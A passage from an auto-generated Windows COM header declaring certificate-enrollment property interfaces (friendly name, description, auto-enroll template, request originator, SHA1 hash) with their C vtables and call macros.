#define ICertPropertyFriendlyName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyFriendlyName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyFriendlyName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyFriendlyName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyFriendlyName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyFriendlyName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyFriendlyName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyFriendlyName_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyFriendlyName_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyFriendlyName_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyFriendlyName_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyFriendlyName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyFriendlyName_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyFriendlyName_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyFriendlyName_Initialize(This,strFriendlyName)	\
    ( (This)->lpVtbl -> Initialize(This,strFriendlyName) ) 

#define ICertPropertyFriendlyName_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyFriendlyName_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyDescription_INTERFACE_DEFINED__
#define __ICertPropertyDescription_INTERFACE_DEFINED__

/* interface ICertPropertyDescription */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyDescription;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab331-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyDescription : public ICertProperty
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strDescription) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Description( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyDescriptionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyDescription * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyDescription * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyDescription * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyDescription * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyDescription * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in BSTR strDescription);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in ICertPropertyDescription * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyDescriptionVtbl;

    interface ICertPropertyDescription
    {
        CONST_VTBL struct ICertPropertyDescriptionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyDescription_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyDescription_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyDescription_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyDescription_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyDescription_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyDescription_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyDescription_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyDescription_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyDescription_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyDescription_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyDescription_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyDescription_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyDescription_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyDescription_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyDescription_Initialize(This,strDescription)	\
    ( (This)->lpVtbl -> Initialize(This,strDescription) ) 

#define ICertPropertyDescription_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyDescription_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyAutoEnroll_INTERFACE_DEFINED__
#define __ICertPropertyAutoEnroll_INTERFACE_DEFINED__

/* interface ICertPropertyAutoEnroll */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyAutoEnroll;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab332-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyAutoEnroll : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyAutoEnrollVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyAutoEnroll * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyAutoEnroll * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyAutoEnroll * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateName )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyAutoEnrollVtbl;

    interface ICertPropertyAutoEnroll
    {
        CONST_VTBL struct ICertPropertyAutoEnrollVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyAutoEnroll_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyAutoEnroll_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyAutoEnroll_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyAutoEnroll_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyAutoEnroll_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyAutoEnroll_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyAutoEnroll_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyAutoEnroll_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyAutoEnroll_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyAutoEnroll_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyAutoEnroll_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyAutoEnroll_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyAutoEnroll_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyAutoEnroll_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyAutoEnroll_Initialize(This,strTemplateName)	\
    ( (This)->lpVtbl -> Initialize(This,strTemplateName) ) 

#define ICertPropertyAutoEnroll_get_TemplateName(This,pValue)	\
    ( (This)->lpVtbl -> get_TemplateName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyAutoEnroll_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyRequestOriginator_INTERFACE_DEFINED__
#define __ICertPropertyRequestOriginator_INTERFACE_DEFINED__

/* interface ICertPropertyRequestOriginator */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyRequestOriginator;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab333-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyRequestOriginator : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strRequestOriginator) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromLocalRequestOriginator( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestOriginator( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyRequestOriginatorVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyRequestOriginator * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in BSTR strRequestOriginator);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromLocalRequestOriginator )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestOriginator )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyRequestOriginatorVtbl;

    interface ICertPropertyRequestOriginator
    {
        CONST_VTBL struct ICertPropertyRequestOriginatorVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyRequestOriginator_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyRequestOriginator_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyRequestOriginator_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyRequestOriginator_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyRequestOriginator_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyRequestOriginator_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyRequestOriginator_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyRequestOriginator_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRequestOriginator_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyRequestOriginator_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyRequestOriginator_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyRequestOriginator_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyRequestOriginator_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRequestOriginator_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyRequestOriginator_Initialize(This,strRequestOriginator)	\
    ( (This)->lpVtbl -> Initialize(This,strRequestOriginator) ) 

#define ICertPropertyRequestOriginator_InitializeFromLocalRequestOriginator(This)	\
    ( (This)->lpVtbl -> InitializeFromLocalRequestOriginator(This) ) 

#define ICertPropertyRequestOriginator_get_RequestOriginator(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestOriginator(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyRequestOriginator_INTERFACE_DEFINED__ */


#ifndef __ICertPropertySHA1Hash_INTERFACE_DEFINED__
#define __ICertPropertySHA1Hash_INTERFACE_DEFINED__

/* interface ICertPropertySHA1Hash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertySHA1Hash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab334-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertySHA1Hash : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SHA1Hash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertySHA1HashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertySHA1Hash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertySHA1Hash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertySHA1Hash * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
